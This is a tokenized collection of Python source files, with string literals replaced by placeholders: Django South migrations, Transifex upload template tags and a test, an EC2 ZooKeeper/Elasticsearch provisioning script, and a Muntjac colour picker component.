'<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django import template <EOL> from django . db import transaction <EOL> from django . core . urlresolvers import reverse <EOL> from django . http import HttpResponseRedirect <EOL> from django . template . defaultfilters import slugify <EOL> from django . forms . util import ErrorList <EOL> from transifex . txcommon . utils import get_url_pattern <EOL> from transifex . languages . models import Language <EOL> from transifex . resources . forms import CreateResourceForm , ResourceTranslationForm , UpdateTranslationForm <EOL> from transifex . resources . models import Resource <EOL> from transifex . resources . backends import ResourceBackend , FormatsBackend , ResourceBackendError , FormatsBackendError , content_from_uploaded_file , filename_of_uploaded_file <EOL> register = template . Library ( ) <EOL> @ transaction . commit_manually <EOL> @ register . inclusion_tag ( "<STR_LIT>" ) <EOL> def upload_create_resource_form ( request , project , prefix = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> resource = None <EOL> display_form = False <EOL> if request . method == '<STR_LIT:POST>' and request . POST . get ( '<STR_LIT>' , None ) : <EOL> cr_form = CreateResourceForm ( <EOL> request . POST , request . FILES , prefix = prefix <EOL> ) <EOL> if cr_form . is_valid ( ) : <EOL> name = cr_form . cleaned_data [ '<STR_LIT:name>' ] <EOL> slug = slugify ( name ) <EOL> try : <EOL> Resource . objects . get ( slug = slug , project = project ) <EOL> except Resource . DoesNotExist : <EOL> pass <EOL> else : <EOL> slug = slugify ( name ) <EOL> identifier = Resource . objects . filter ( <EOL> project = project , slug__icontains = "<STR_LIT>" % slug <EOL> ) . count ( ) + <NUM_LIT:1> <EOL> slug = "<STR_LIT>" % ( slug , identifier ) <EOL> method = cr_form . cleaned_data [ '<STR_LIT>' ] <EOL> content = content_from_uploaded_file ( request . FILES ) <EOL> filename = filename_of_uploaded_file ( request . FILES ) <EOL> rb = ResourceBackend ( ) <EOL> try : <EOL> rb . create ( <EOL> project , slug , name , method , project . source_language , <EOL> content , user = request . user , <EOL> extra_data = { '<STR_LIT:filename>' : filename } <EOL> ) <EOL> except ResourceBackendError , e : <EOL> transaction . rollback ( ) <EOL> cr_form . _errors [ '<STR_LIT>' ] = ErrorList ( [ e . message , ] ) <EOL> display_form = True <EOL> else : <EOL> transaction . commit ( ) <EOL> display_form = False <EOL> resource = Resource . objects . get ( slug = slug , project = project ) <EOL> else : <EOL> display_form = True <EOL> else : <EOL> cr_form = CreateResourceForm ( prefix = prefix ) <EOL> display_form = False <EOL> return { <EOL> '<STR_LIT>' : project , <EOL> '<STR_LIT>' : resource , <EOL> '<STR_LIT>' : cr_form , <EOL> '<STR_LIT>' : display_form , <EOL> } <EOL> @ register . inclusion_tag ( "<STR_LIT>" , takes_context = True ) <EOL> def upload_resource_translation_button ( context , request , resource , language = None , <EOL> prefix = '<STR_LIT>' , translate_online = False ) : <EOL> """<STR_LIT>""" <EOL> if language or ( request . POST and <EOL> request . POST . get ( '<STR_LIT>' , None ) ) : <EOL> return update_translation_form ( context , request , resource , language ) <EOL> else : <EOL> return create_translation_form ( context , request , resource , language ) <EOL> def create_translation_form ( context , request , resource , language = None , <EOL> prefix = '<STR_LIT>' , translate_online = True ) : <EOL> form = ResourceTranslationForm ( prefix = prefix ) <EOL> return { <EOL> '<STR_LIT>' : resource . project , <EOL> '<STR_LIT>' : resource , <EOL> '<STR_LIT>' : language , <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : translate_online , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : context [ '<STR_LIT>' ] , <EOL> } <EOL> def update_translation_form ( context , request , resource , language = None , <EOL> prefix = '<STR_LIT>' , translate_online = False ) : <EOL> """<STR_LIT>""" <EOL> if language : <EOL> initial = { "<STR_LIT>" : language . code , } <EOL> else : <EOL> initial = { } <EOL> form = UpdateTranslationForm ( prefix = prefix , initial = initial ) <EOL> return { <EOL> '<STR_LIT>' : resource . project , <EOL> '<STR_LIT>' : resource , <EOL> '<STR_LIT>' : language , <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : context [ '<STR_LIT>' ] , <EOL> } </s>
<s> from status import * <EOL> from views import * <EOL> from permissions import * </s>
<s> from transifex . projects . models import Project <EOL> from transifex . teams . models import Team <EOL> from transifex . txcommon . tests import base <EOL> class TestTeamModels ( base . BaseTestCase ) : <EOL> def test_available_teams ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEquals ( self . project . available_teams . count ( ) , <NUM_LIT:1> ) <EOL> team = Team . objects . get_or_create ( language = self . language_ar , <EOL> project = self . project , creator = self . user [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> project = Project . objects . get_or_create ( slug = "<STR_LIT:foo>" , <EOL> defaults = { '<STR_LIT:name>' : "<STR_LIT>" } , <EOL> source_language = self . language_en ) [ <NUM_LIT:0> ] <EOL> project . outsource = self . project <EOL> self . assertEquals ( project . available_teams . count ( ) , <NUM_LIT:2> ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import DataMigration <EOL> from django . db import models <EOL> from django . db . utils import DatabaseError <EOL> class Migration ( DataMigration ) : <EOL> depends_on = ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ) <EOL> def forwards ( self , orm ) : <EOL> try : <EOL> for a in orm [ '<STR_LIT>' ] . objects . filter ( valid = True ) : <EOL> try : <EOL> a . user . profile . mugshot = a . image <EOL> a . user . profile . save ( ) <EOL> except Exception , e : <EOL> print "<STR_LIT>" % ( a . user , <EOL> e . message ) <EOL> except DatabaseError : <EOL> pass <EOL> def backwards ( self , orm ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT:code>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:location>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:key>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import DataMigration <EOL> from django . db import models <EOL> from authority . models import Permission <EOL> class Migration ( DataMigration ) : <EOL> def forwards ( self , orm ) : <EOL> """<STR_LIT>""" <EOL> Permission . objects . filter ( codename = "<STR_LIT>" <EOL> ) . update ( codename = "<STR_LIT>" ) <EOL> def backwards ( self , orm ) : <EOL> """<STR_LIT>""" <EOL> Permission . objects . filter ( codename = "<STR_LIT>" <EOL> ) . update ( codename = "<STR_LIT>" ) <EOL> models = { } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import boto3 , os , argparse , sys <EOL> sys . path . append ( "<STR_LIT:..>" ) <EOL> from botocore . exceptions import ClientError as BotoClientError <EOL> from time import sleep <EOL> from create_clusters import get_tag , keyfile <EOL> from config_utils import quiet_wrap <EOL> my_instances_filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ get_tag ( '<STR_LIT>' ) ] } ] <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> args = parser . parse_args ( ) <EOL> ec2 = boto3 . resource ( '<STR_LIT>' ) <EOL> hosts = [ ] <EOL> private_ips = [ ] <EOL> reservations = ec2 . instances . filter ( Filters = my_instances_filters ) <EOL> for instance in reservations : <EOL> print ( "<STR_LIT>" . format ( instance . instance_id , instance . public_ip_address ) ) <EOL> hosts . append ( instance . public_ip_address ) <EOL> private_ips . append ( instance . private_ip_address ) <EOL> if len ( hosts ) != len ( private_ips ) : <EOL> raise ( RuntimeError ( "<STR_LIT>" ) ) <EOL> if len ( hosts ) == <NUM_LIT:0> : <EOL> raise ( RuntimeError ( "<STR_LIT>" ) ) <EOL> print ( "<STR_LIT>" ) <EOL> zooid = <NUM_LIT:1> <EOL> for h in hosts : <EOL> cmd_str = [ ] <EOL> with open ( "<STR_LIT>" , "<STR_LIT:w>" ) as tmpfile : <EOL> with open ( "<STR_LIT>" , "<STR_LIT:r>" ) as f : <EOL> for l in f : <EOL> tmpfile . write ( l ) <EOL> host_strings = [ "<STR_LIT>" . format ( i + <NUM_LIT:1> , private_ips [ i ] ) for i in range ( len ( hosts ) ) ] <EOL> for s in host_strings : <EOL> tmpfile . write ( s + "<STR_LIT:\n>" ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , tmpfile . name , h ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h , zooid ) ) <EOL> zooid += <NUM_LIT:1> <EOL> for cmd in cmd_str : <EOL> print ( cmd ) <EOL> res = os . system ( cmd ) <EOL> if res != <NUM_LIT:0> : <EOL> raise ( RuntimeError ( "<STR_LIT>" . format ( cmd , res ) ) ) <EOL> cmd_str = [ "<STR_LIT>" . format ( keyfile , h ) for h in hosts ] <EOL> for cmd in cmd_str : <EOL> print ( cmd ) <EOL> res = os . system ( cmd ) <EOL> if res != <NUM_LIT:0> : <EOL> raise ( RuntimeError ( "<STR_LIT>" . format ( cmd , res ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> for h in hosts : <EOL> cmd_str = [ ] <EOL> with open ( "<STR_LIT>" , "<STR_LIT:w>" ) as tmpfile : <EOL> with open ( "<STR_LIT>" , "<STR_LIT:r>" ) as f : <EOL> for l in f : <EOL> tmpfile . write ( l ) <EOL> tmpfile . write ( "<STR_LIT>" ) <EOL> host_strings = [ "<STR_LIT>" . format ( private_ips [ i ] ) for i in range ( len ( hosts ) ) ] <EOL> for v in host_strings : <EOL> tmpfile . write ( v ) <EOL> tmpfile . write ( "<STR_LIT>" . format ( private_ips [ <NUM_LIT:0> ] ) ) <EOL> tmpfile . write ( "<STR_LIT>" ) <EOL> tmpfile . write ( "<STR_LIT>" ) <EOL> tmpfile . write ( "<STR_LIT>" . join ( [ "<STR_LIT>" . format ( [ <NUM_LIT> + i for i in range ( len ( hosts ) ) ] ) ] ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , tmpfile . name , h ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h ) ) <EOL> if h == hosts [ <NUM_LIT:0> ] : <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h , quiet_wrap ( "<STR_LIT>" ) ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h , quiet_wrap ( "<STR_LIT>" ) ) ) <EOL> else : <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h , quiet_wrap ( "<STR_LIT>" ) ) ) <EOL> for cmd in cmd_str : <EOL> print ( cmd ) <EOL> res = os . system ( cmd ) <EOL> if res != <NUM_LIT:0> : <EOL> raise ( RuntimeError ( "<STR_LIT>" . format ( cmd , res ) ) ) <EOL> print ( "<STR_LIT>" . format ( hosts [ <NUM_LIT:0> ] ) ) <EOL> print ( "<STR_LIT:\n>" . join ( [ "<STR_LIT>" + h for h in hosts [ <NUM_LIT:1> : ] ] ) ) <EOL> if args . elasticsearch == True : <EOL> cmd_str = [ ] <EOL> for h in hosts : <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , "<STR_LIT>" , h ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h ) ) <EOL> for cmd in cmd_str : <EOL> print ( cmd ) <EOL> res = os . system ( cmd ) <EOL> if res != <NUM_LIT:0> : <EOL> raise ( RuntimeError ( "<STR_LIT>" . format ( cmd , res ) ) ) <EOL> print ( "<STR_LIT>" ) <EOL> with open ( "<STR_LIT>" , "<STR_LIT:w>" ) as tmpfile : <EOL> with open ( "<STR_LIT>" , "<STR_LIT:r>" ) as f : <EOL> for l in f : <EOL> tmpfile . write ( l ) <EOL> S = boto3 . _get_default_session ( ) <EOL> profile = S . _session . full_config [ '<STR_LIT>' ] [ '<STR_LIT:default>' ] <EOL> tmpfile . write ( "<STR_LIT>" . format ( profile [ '<STR_LIT>' ] ) ) <EOL> tmpfile . write ( "<STR_LIT>" . format ( profile [ '<STR_LIT>' ] ) ) <EOL> tmpfile . write ( "<STR_LIT>" . format ( profile [ '<STR_LIT>' ] ) ) <EOL> tmpfile . write ( "<STR_LIT>" ) <EOL> tmpfile . write ( "<STR_LIT>" . format ( get_tag ( '<STR_LIT>' ) ) ) <EOL> tmpfile . write ( "<STR_LIT>" . format ( get_tag ( '<STR_LIT>' ) ) ) <EOL> cmd_str = [ ] <EOL> for h in hosts : <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , tmpfile . name , h ) ) <EOL> cmd_str . append ( "<STR_LIT>" . format ( keyfile , h ) ) <EOL> cmd_str . extend ( [ "<STR_LIT>" . format ( keyfile , h ) for h in hosts ] ) <EOL> for cmd in cmd_str : <EOL> print ( cmd ) <EOL> res = os . system ( cmd ) <EOL> if res != <NUM_LIT:0> : <EOL> raise ( RuntimeError ( "<STR_LIT>" . format ( cmd , res ) ) ) </s>
<s> from collections import deque <EOL> from muntjac . addon . colorpicker . color import Color <EOL> from muntjac . ui . custom_component import CustomComponent <EOL> from muntjac . addon . colorpicker . color_picker_grid import ColorPickerGrid <EOL> from muntjac . addon . colorpicker . color_change_event import ColorChangeEvent <EOL> from muntjac . addon . colorpicker . color_picker import IColorChangeListener <EOL> from muntjac . addon . colorpicker . color_selector import IColorSelector <EOL> _COLOR_CHANGE_METHOD = getattr ( IColorChangeListener , '<STR_LIT>' ) <EOL> class ColorPickerHistory ( CustomComponent , IColorSelector , <EOL> IColorChangeListener ) : <EOL> """<STR_LIT>""" <EOL> _STYLENAME = '<STR_LIT>' <EOL> _rows = <NUM_LIT:4> <EOL> _columns = <NUM_LIT:15> <EOL> _colorHistory = deque ( ) <EOL> _grid = None <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ColorPickerHistory , self ) . __init__ ( ) <EOL> self . removeStyleName ( '<STR_LIT>' ) <EOL> self . setStyleName ( self . _STYLENAME ) <EOL> self . _grid = ColorPickerGrid ( self . _rows , self . _columns ) <EOL> self . _grid . setWidth ( '<STR_LIT>' ) <EOL> self . _grid . setPosition ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . _grid . addListener ( self , IColorChangeListener ) <EOL> self . setCompositionRoot ( self . _grid ) <EOL> def setHeight ( self , height , unit = None ) : <EOL> super ( ColorPickerHistory , self ) . setHeight ( height , unit ) <EOL> self . _grid . setHeight ( height , unit ) <EOL> def setColor ( self , color ) : <EOL> exists = False <EOL> for c in self . _colorHistory : <EOL> if color == c : <EOL> exists = True <EOL> break <EOL> if not exists : <EOL> self . _colorHistory . append ( color ) <EOL> colorList = list ( self . _colorHistory ) <EOL> colorList . reverse ( ) <EOL> colorList . insert ( <NUM_LIT:0> , colorList . pop ( colorList . index ( color ) ) ) <EOL> colors = [ ( [ None ] * self . _columns ) for _ in range ( self . _rows ) ] <EOL> iterator = iter ( colorList ) <EOL> for row in range ( self . _rows ) : <EOL> for col in range ( self . _columns ) : <EOL> try : <EOL> colors [ row ] [ col ] = iterator . next ( ) <EOL> except StopIteration : <EOL> colors [ row ] [ col ] = Color . WHITE <EOL> self . _grid . setColorGrid ( colors ) <EOL> self . _grid . requestRepaint ( ) <EOL> def getColor ( self ) : <EOL> return self . _colorHistory [ <NUM_LIT:0> ] <EOL> def getHistory ( self ) : <EOL> """<STR_LIT>""" <EOL> array = list ( self . _colorHistory ) <EOL> return array <EOL> def hasColor ( self , c ) : <EOL> """<STR_LIT>""" <EOL> return c in self . _colorHistory <EOL> def addListener ( self , listener , iface = None ) : <EOL> """<STR_LIT>""" <EOL> if ( isinstance ( listener , IColorChangeListener ) and <EOL> ( iface is None or issubclass ( iface , IColorChangeListener ) ) ) : <EOL> self . registerListener ( ColorChangeEvent , listener , <EOL> _COLOR_CHANGE_METHOD ) <EOL> super ( ColorPickerHistory , self ) . addListener ( listener , iface ) <EOL> def addCallback ( self , callback , eventType = None , * args ) : <EOL> if eventType is None : <EOL> eventType = callback . _eventType <EOL> if issubclass ( eventType , ColorChangeEvent ) : <EOL> self . registerCallback ( ColorChangeEvent , callback , None , * args ) <EOL> else : <EOL> super ( ColorPickerHistory , self ) . addCallback ( callback , eventType , <EOL> * args ) <EOL> def removeListener ( self , listener , iface = None ) : <EOL> """<STR_LIT>""" <EOL> if ( isinstance ( listener , IColorChangeListener ) and <EOL> ( iface is None or issubclass ( iface , IColorChangeListener ) ) ) : <EOL> self . withdrawListener ( ColorChangeEvent , listener ) <EOL> super ( ColorPickerHistory , self ) . removeListener ( listener , iface ) <EOL> def removeCallback ( self , callback , eventType = None ) : <EOL> if eventType is None : <EOL> eventType = callback . _eventType <EOL> if issubclass ( eventType , ColorChangeEvent ) : <EOL> self . withdrawCallback ( ColorChangeEvent , callback ) <EOL> else : <EOL> super ( ColorPickerHistory , self ) . removeCallback ( callback , eventType ) <EOL> def colorChanged ( self 